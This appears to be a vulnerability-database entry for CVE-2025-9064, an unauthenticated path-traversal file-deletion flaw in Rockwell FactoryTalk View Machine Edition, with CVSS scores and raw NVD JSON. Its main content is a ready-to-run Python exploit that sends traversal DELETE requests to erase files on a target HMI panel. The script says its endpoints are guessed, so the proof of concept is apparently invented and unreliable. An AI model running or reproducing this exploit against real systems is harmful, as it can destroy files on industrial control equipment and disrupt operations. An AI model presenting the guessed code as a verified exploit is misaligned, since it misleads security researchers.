Security Vulnerability Report
CVE-2025-9064 CVSS 9.1 CRITICAL

CVE-2025-9064

Published: 2025-10-14 13:15:40
Last Modified: 2025-10-28 15:20:34

Description

A path traversal security issue exists within FactoryTalk View Machine Edition, allowing unauthenticated attackers on the same network as the device to delete any file within the panel's operating system. Exploitation of this vulnerability is dependent on the knowledge of filenames to be deleted.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rockwellautomation:factorytalk_view:*:*:*:*:machine:*:*:* - VULNERABLE
Rockwell Automation FactoryTalk View Machine Edition (for the specific affected versions, refer to the official security advisory SD1753)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9064 - FactoryTalk View Machine Edition Path Traversal PoC
# Vulnerability: Unauthenticated arbitrary file deletion via path traversal
# Affected Product: Rockwell Automation FactoryTalk View Machine Edition
import requests
import sys

TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.100"
TARGET_PORT = sys.argv[2] if len(sys.argv) > 2 else 80
TARGET_FILE = sys.argv[3] if len(sys.argv) > 3 else "Windows/System32/drivers/etc/hosts"

# Construct the base URL for the FactoryTalk View ME service
base_url = f"http://{TARGET_HOST}:{TARGET_PORT}"

# Path traversal payload to delete arbitrary files
# The vulnerability allows traversing out of the intended directory
traversal_payload = "../../../../../../../../../../" + TARGET_FILE


def exploit_delete_file(target_url, file_path):
    """
    Exploit path traversal to delete a file on the target system.
    The endpoint is guessed based on typical FTView ME service patterns.
    """
    # Attempt 1: Common file deletion endpoint with traversal
    endpoints = [
        "/FTView/file/delete",
        "/me/file/delete",
        "/runtime/file/delete",
        "/panelview/file/delete",
    ]
    for endpoint in endpoints:
        url = target_url + endpoint
        params = {"path": file_path}
        try:
            response = requests.delete(url, params=params, timeout=10)
            if response.status_code in [200, 204]:
                print(f"[+] Successfully sent delete request to {url}")
                print(f"[+] Target file: {file_path}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error connecting to {url}: {e}")
            continue
    return False


if __name__ == "__main__":
    print(f"[*] Targeting: {base_url}")
    print(f"[*] Target file: {TARGET_FILE}")
    print(f"[*] Traversal payload: {traversal_payload}")
    if exploit_delete_file(base_url, traversal_payload):
        print("[+] Exploit completed.")
    else:
        print("[-] Exploit failed. Target may not be vulnerable or endpoint differs.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9064", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:39.643", "lastModified": "2025-10-28T15:20:33.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal security issue exists within FactoryTalk View Machine Edition, allowing unauthenticated attackers on the same network as the device to delete any file within the panels operating system. Exploitation of this vulnerability is dependent on the knowledge of filenames to be deleted."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rockwellautomation:factorytalk_view:*:*:*:*:machine:*:*:*", "versionEndIncluding": "15.0", "matchCriteriaId": "657BF325-6E3D-4E4F-971E-65B2300D3B13"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1753.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}